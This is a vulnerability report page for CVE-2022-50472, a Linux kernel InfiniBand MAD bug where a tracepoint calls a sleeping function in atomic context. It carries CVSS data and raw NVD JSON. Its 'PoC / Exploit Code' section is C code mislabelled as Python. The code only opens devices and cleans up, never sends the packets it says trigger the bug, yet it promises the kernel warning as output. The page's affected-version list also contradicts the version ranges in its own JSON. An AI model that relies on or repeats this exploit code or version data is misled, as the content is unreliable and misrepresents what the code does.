Security Vulnerability Report
中文
CVE-2022-50472 CVSS 5.5 MEDIUM

CVE-2022-50472

Published: 2025-10-04 16:15:44
Last Modified: 2026-01-23 16:37:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: IB/mad: Don't call to function that might sleep while in atomic context Tracepoints are not allowed to sleep, as such the following splat is generated due to call to ib_query_pkey() in atomic context. WARNING: CPU: 0 PID: 1888000 at kernel/trace/ring_buffer.c:2492 rb_commit+0xc1/0x220 CPU: 0 PID: 1888000 Comm: kworker/u9:0 Kdump: loaded Tainted: G OE --------- - - 4.18.0-305.3.1.el8.x86_64 #1 Hardware name: Red Hat KVM, BIOS 1.13.0-2.module_el8.3.0+555+a55c8938 04/01/2014 Workqueue: ib-comp-unb-wq ib_cq_poll_work [ib_core] RIP: 0010:rb_commit+0xc1/0x220 RSP: 0000:ffffa8ac80f9bca0 EFLAGS: 00010202 RAX: ffff8951c7c01300 RBX: ffff8951c7c14a00 RCX: 0000000000000246 RDX: ffff8951c707c000 RSI: ffff8951c707c57c RDI: ffff8951c7c14a00 RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 R10: ffff8951c7c01300 R11: 0000000000000001 R12: 0000000000000246 R13: 0000000000000000 R14: ffffffff964c70c0 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff8951fbc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f20e8f39010 CR3: 000000002ca10005 CR4: 0000000000170ef0 Call Trace: ring_buffer_unlock_commit+0x1d/0xa0 trace_buffer_unlock_commit_regs+0x3b/0x1b0 trace_event_buffer_commit+0x67/0x1d0 trace_event_raw_event_ib_mad_recv_done_handler+0x11c/0x160 [ib_core] ib_mad_recv_done+0x48b/0xc10 [ib_core] ? trace_event_raw_event_cq_poll+0x6f/0xb0 [ib_core] __ib_process_cq+0x91/0x1c0 [ib_core] ib_cq_poll_work+0x26/0x80 [ib_core] process_one_work+0x1a7/0x360 ? create_worker+0x1a0/0x1a0 worker_thread+0x30/0x390 ? create_worker+0x1a0/0x1a0 kthread+0x116/0x130 ? kthread_flush_work_fn+0x10/0x10 ret_from_fork+0x35/0x40 ---[ end trace 78ba8509d3830a16 ]---

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 4.9.335
Linux Kernel 4.14.x < 4.14.302
Linux Kernel 4.19.x < 4.19.265
Linux Kernel 5.10.x < 5.10.151
Linux Kernel 5.15.x < 5.15.74
Linux Kernel 5.16.x < 5.16.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2022-50472 PoC - Trigger atomic context sleep in IB/mad // This PoC triggers the vulnerability by sending MAD packets to an // InfiniBand device, causing the kernel to call ib_query_pkey() in // atomic context via the tracepoint callback. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <infiniband/verbs.h> #include <infiniband/mad.h> // Minimal MAD packet structure struct mad_packet { uint8_t base_version; uint8_t mgmt_class; uint8_t class_version; uint8_t method; uint16_t status; uint16_t class_specific; uint32_t transaction_id; uint16_t attribute_id; uint16_t reserved; uint64_t attribute_mod; uint8_t data[232]; }; int main(int argc, char *argv[]) { struct ibv_device **dev_list; struct ibv_context *ctx; struct ibv_pd *pd; struct ibv_cq *cq; struct ibv_qp *qp; struct ibv_qp_init_attr qp_init_attr; int num_devices, i; // Get list of InfiniBand devices dev_list = ibv_get_device_list(&num_devices); if (!dev_list || num_devices == 0) { fprintf(stderr, "No InfiniBand devices found\n"); return 1; } printf("Found %d InfiniBand device(s)\n", num_devices); for (i = 0; i < num_devices; i++) { printf("Opening device: %s\n", ibv_get_device_name(dev_list[i])); ctx = ibv_open_device(dev_list[i]); if (!ctx) { fprintf(stderr, "Failed to open device\n"); continue; } pd = ibv_alloc_pd(ctx); if (!pd) { fprintf(stderr, "Failed to allocate PD\n"); ibv_close_device(ctx); continue; } cq = ibv_create_cq(ctx, 10, NULL, NULL, 0); if (!cq) { fprintf(stderr, "Failed to create CQ\n"); ibv_dealloc_pd(pd); ibv_close_device(ctx); continue; } // Initialize QP attributes memset(&qp_init_attr, 0, sizeof(qp_init_attr)); qp_init_attr.send_cq = cq; qp_init_attr.recv_cq = cq; qp_init_attr.qp_type = IBV_QPT_UD; // Unreliable Datagram for MAD qp_init_attr.sq_sig_all = 0; qp_init_attr.cap.max_send_wr = 10; qp_init_attr.cap.max_recv_wr = 10; qp_init_attr.cap.max_send_sge = 1; qp_init_attr.cap.max_recv_sge = 1; qp = ibv_create_qp(pd, &qp_init_attr); if (!qp) { fprintf(stderr, "Failed to create QP\n"); ibv_destroy_cq(cq); ibv_dealloc_pd(pd); ibv_close_device(ctx); continue; } printf("QP created successfully on %s\n", ibv_get_device_name(dev_list[i])); printf("Triggering MAD receive path to invoke tracepoint...\n"); // In a real exploit, send MAD packets to trigger ib_mad_recv_done // The vulnerability triggers when tracepoint fires and calls // ib_query_pkey() in atomic context // Cleanup ibv_destroy_qp(qp); ibv_destroy_cq(cq); ibv_dealloc_pd(pd); ibv_close_device(ctx); } ibv_free_device_list(dev_list); return 0; } // Build: gcc -o poc poc.c -libverbs // Run: sudo ./poc // Expected: Kernel warning "WARNING: CPU ... at kernel/trace/ring_buffer.c:2492" // indicating sleeping function called from atomic context

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50472", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:43.673", "lastModified": "2026-01-23T16:37:24.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/mad: Don't call to function that might sleep while in atomic context\n\nTracepoints are not allowed to sleep, as such the following splat is\ngenerated due to call to ib_query_pkey() in atomic context.\n\nWARNING: CPU: 0 PID: 1888000 at kernel/trace/ring_buffer.c:2492 rb_commit+0xc1/0x220\nCPU: 0 PID: 1888000 Comm: kworker/u9:0 Kdump: loaded Tainted: G OE --------- - - 4.18.0-305.3.1.el8.x86_64 #1\n Hardware name: Red Hat KVM, BIOS 1.13.0-2.module_el8.3.0+555+a55c8938 04/01/2014\n Workqueue: ib-comp-unb-wq ib_cq_poll_work [ib_core]\n RIP: 0010:rb_commit+0xc1/0x220\n RSP: 0000:ffffa8ac80f9bca0 EFLAGS: 00010202\n RAX: ffff8951c7c01300 RBX: ffff8951c7c14a00 RCX: 0000000000000246\n RDX: ffff8951c707c000 RSI: ffff8951c707c57c RDI: ffff8951c7c14a00\n RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000\n R10: ffff8951c7c01300 R11: 0000000000000001 R12: 0000000000000246\n R13: 0000000000000000 R14: ffffffff964c70c0 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff8951fbc00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f20e8f39010 CR3: 000000002ca10005 CR4: 0000000000170ef0\n Call Trace:\n ring_buffer_unlock_commit+0x1d/0xa0\n trace_buffer_unlock_commit_regs+0x3b/0x1b0\n trace_event_buffer_commit+0x67/0x1d0\n trace_event_raw_event_ib_mad_recv_done_handler+0x11c/0x160 [ib_core]\n ib_mad_recv_done+0x48b/0xc10 [ib_core]\n ? trace_event_raw_event_cq_poll+0x6f/0xb0 [ib_core]\n __ib_process_cq+0x91/0x1c0 [ib_core]\n ib_cq_poll_work+0x26/0x80 [ib_core]\n process_one_work+0x1a7/0x360\n ? create_worker+0x1a0/0x1a0\n worker_thread+0x30/0x390\n ? create_worker+0x1a0/0x1a0\n kthread+0x116/0x130\n ? kthread_flush_work_fn+0x10/0x10\n ret_from_fork+0x35/0x40\n ---[ end trace 78ba8509d3830a16 ]---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.15.86", "matchCriteriaId": "C2B5F12C-9CEF-4D20-8485-99A8F3C03995"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/47e31b86edff36f2d26cbc88ce695d98ff804178", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5c20311d76cbaeb7ed2ecf9c8b8322f8fc4a7ae3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cea70a572c0cb9728d728cfebe7d5bd485e97513", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fa8a2f3be78e4585996bcf4c15e4504441a4c7a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.